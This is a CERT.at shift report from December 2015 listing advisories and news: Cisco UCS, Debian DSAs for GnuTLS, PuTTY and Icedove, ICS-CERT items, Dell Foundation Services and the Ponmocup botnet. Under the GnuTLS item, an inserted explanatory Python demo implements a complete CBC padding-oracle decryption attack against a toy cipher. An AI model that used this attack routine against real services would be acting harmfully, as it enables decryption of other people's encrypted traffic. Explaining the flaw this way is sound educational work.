End-of-Shift report
Timeframe: Tuesday 01-12-2015 18:00 − Wednesday 02-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
Cisco Unified Computing System Central Software Cross-Site Scripting Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151201-ucs
DSA-3408 gnutls26 - security update
It was discovered that GnuTLS, a library implementing the TLS and SSL protocols, incorrectly validates the first byte of padding in CBC modes. A remote attacker can possibly take advantage of this flaw to perform a padding oracle attack.
https://www.debian.org/security/2015/dsa-3408
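To show why a wrong padding check in CBC mode matters, here is an added example; it is not GnuTLS code and not taken from the Debian advisory. It pairs a correct padding check with a weak one that verifies only a single padding byte, and runs the classic padding-oracle decryption that needs nothing but the accept/reject signal. Everything in it is an assumption made for the demonstration: the block cipher is a SHA-256-keyed Feistel network standing in for AES, the padding is PKCS#7-style, the key, IV and message are constructed, and lax_unpad illustrates the bug class rather than GnuTLS's actual code path.

```python
import hashlib
BLOCK = 16  # cipher block size in bytes

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    # 4-round Feistel network, a toy stand-in for AES (assumption, not GnuTLS).
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return right + left

def block_decrypt(key, block):
    right, left = block[:8], block[8:]
    for rnd in reversed(range(4)):
        right, left = left, _xor(right, _f(key, left, rnd))
    return left + right

def pad(data):
    # PKCS#7-style padding: n bytes, each of value n.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def strict_unpad(data):
    # Correct check: length in range and every padding byte equal to it.
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def lax_unpad(data):
    # Weak check (illustrative): only the length byte and the first padding
    # byte are verified; the bytes in between are never examined.
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n] != n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for chunk in _blocks(padded):
        prev = block_encrypt(key, _xor(chunk, prev))
        out += prev
    return out

def cbc_decrypt_raw(key, iv, ciphertext):
    blocks = [iv] + _blocks(ciphertext)
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def make_oracle(key, unpad):
    # Models a peer that reveals (error code, timing) whether padding was accepted.
    def oracle(iv, ciphertext):
        try:
            unpad(cbc_decrypt_raw(key, iv, ciphertext))
        except ValueError:
            return False
        return True
    return oracle

def padding_oracle_attack(oracle, iv, ciphertext):
    # Recover the padded plaintext byte by byte using only the accept/reject signal.
    blocks = [iv] + _blocks(ciphertext)
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)        # block_decrypt(key, cur), learned byte by byte
        for j in range(BLOCK - 1, -1, -1):
            p = BLOCK - j               # padding value forced onto bytes j..15
            forged = bytearray(BLOCK)
            for k in range(j + 1, BLOCK):
                forged[k] = inter[k] ^ p
            for g in range(256):
                forged[j] = g
                if not oracle(bytes(forged), cur):
                    continue
                if j == BLOCK - 1:      # rule out an accidental longer pad (02 02, ...)
                    forged[j - 1] ^= 0xFF
                    ok = oracle(bytes(forged), cur)
                    forged[j - 1] ^= 0xFF
                    if not ok:
                        continue
                inter[j] = g ^ p
                break
            else:
                raise RuntimeError("oracle never accepted a guess")
        recovered += _xor(inter, prev)
    return recovered

# Constructed sample input, not taken from any real session.
KEY = b"demo-key-not-secret"
IV = bytes(range(BLOCK))
MESSAGE = b"attack at dawn, bring the padding"
```

Running padding_oracle_attack(make_oracle(KEY, strict_unpad), IV, cbc_encrypt(KEY, IV, pad(MESSAGE))) returns the padded MESSAGE without ever touching KEY, and it works against the correct check just as well as against the weak one: the attacker only needs to observe whether padding was accepted. The weak check additionally accepts records such as 11 data bytes followed by 05 09 09 09 05, which strict_unpad rejects. This is why CBC ciphersuites must verify the MAC and reject malformed records without leaking which check failed.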
VU#630239: Epiphany Cardio Server version 3.3 is vulnerable to SQL and LDAP injection
The Epiphany Cardio Server prior to version 4.0 is vulnerable to SQL injection and LDAP injection, allowing an unauthenticated attacker to gain administrator rights.
http://www.kb.cert.org/vuls/id/630239
Cisco UCS Central Software Server-Side Request Forgery Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151201-ucs1
Saia Burgess Controls PCD Controller Hard-coded Password Vulnerability
This advisory provides mitigation details for a hard-coded password vulnerability in Saia Burgess Controls's family of PCD controllers.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-01
Schneider Electric ProClima ActiveX Control Vulnerabilities
This advisory provides mitigation details for remote code execution vulnerabilities in the Schneider Electric ProClima F1 Bookview ActiveX control application.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-02
Siemens SIMATIC Communication Processor Vulnerability
This advisory provides mitigation details for an authentication bypass vulnerability in the Siemens SIMATIC Communication Processor devices.
https://ics-cert.us-cert.gov/advisories/ICSA-15-335-03
DSA-3409 putty - security update
A memory-corrupting integer overflow in the handling of the ECH (erase characters) control sequence was discovered in PuTTY's terminal emulator. A remote attacker can take advantage of this flaw to mount a denial of service or potentially to execute arbitrary code.
https://www.debian.org/security/2015/dsa-3409
Security Advisory - Privilege Escalation Vulnerability in Huawei LogCenter
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-464243.htm
Security Advisory - DoS Vulnerability in Huawei LogCenter
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-464247.htm
Entropy drought hits Raspberry Pi harvests, weakens SSH security
Hotfix posted online to shore up Raspbian key generation
Raspberry Pis running Raspbian - a flavor of Debian GNU/Linux tuned for the credit-card-sized computers - apparently generate weak SSH host keys.
www.theregister.co.uk/2015/12/02/raspberry_pi_weak_ssh_keys/
DSA-3410 icedove - security update
Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail client: multiple memory safety errors, integer overflows, buffer overflows and other implementation errors may lead to the execution of arbitrary code or denial of service.
https://www.debian.org/security/2015/dsa-3410
Chrome for Linux: Google drops the 32-bit version
Support ends in March 2016; the community can continue to produce its own builds
http://derstandard.at/2000026808558
BSides Vienna 2015 Slides
The slides of the BSides Vienna are available online and linked directly at the schedule page:
https://bsidesvienna.at/talks/
You can also wget them:
wget http://bsidesvienna.at/slides/2015/a_case_study_on_the_security_of_application_whitelisting.pdf
wget http://bsidesvienna.at/slides/2015/closing_slides.pdf
wget http://bsidesvienna.at/slides/2015/crypto_wars_2.0.pdf
wget http://bsidesvienna.at/slides/2015/digital_supply_chain_security.pdf
http://www.reddit.com/r/netsec/comments/3v50y7/bsides_vienna_2015_slides/
Security: Bug bounty for Barbie dolls
Vtech toys are not the only insecure ones: Mattel's controversial Wi-Fi Barbie is not too careful about security either. A hacker was able to read numerous pieces of information out of the doll and believes he can also tamper with its server connection.
http://www.golem.de/news/security-bug-bounty-fuer-barbie-puppen-1512-117769.html
Nessus and Powershell is like Chocolate and Peanut Butter!, (Wed, Dec 2nd)
In a typical security assessment, you'll do authenticated scans of internal hosts, looking for vulnerabilities due to missed patches or configuration issues. I often use Nessus for this, but find that for a typical IT manager, the Nessus ..
https://isc.sans.edu/diary.html?storyid=20431
Ponmocup
Ponmocup, 2 December 2015. Currently the botnet for which we receive the most infection reports is still Conficker. Far behind it come "gozi", "nymaim", "ZeuS" (incl. variants), "tinba" and "dyre". The exact numbers vary a lot; the consistency of the measurements is not the best. Now we have a new name high up on the list: "Ponmocup". The malware itself is not new; some place the ..
http://www.cert.at/services/blog/20151202163506-1641.html
The Perils of Vendor Bloatware
In today's Stormcast, Johannes summarizes the current issue with some of the software that comes pre-installed on Dell laptops. In short, Dell Foundation Services, which is used for remote management, allows unauthenticated WMI queries to be processed, ..
https://isc.sans.edu/diary.html?storyid=20433
IBM Security Bulletin: A potential security vulnerability in WebSphere Liberty Profile affects InfoSphere Streams (CVE-2015-1927)
http://www.ibm.com/support/docview.wss?uid=swg21967767
IBM Security Bulletin: IBM Cognos Business Intelligence Server 2015Q4 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities.
http://www.ibm.com/support/docview.wss?uid=swg21959874
IBM Security Bulletin: Multiple vulnerabilities in Apache HttpComponents affect IBM Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)
http://www.ibm.com/support/docview.wss?uid=swg21970193
Dell's fix makes the Foundation Services hole worse
Attackers from the web can read the service tag of certain Dell computers and use it to track users. Dell has now closed this hole. Since the update, however, the entire hardware configuration, among other things, can be read out.
http://www.heise.de/security/meldung/Dell-verschlimmbessert-die-Foundation-Services-Luecke-3029552.html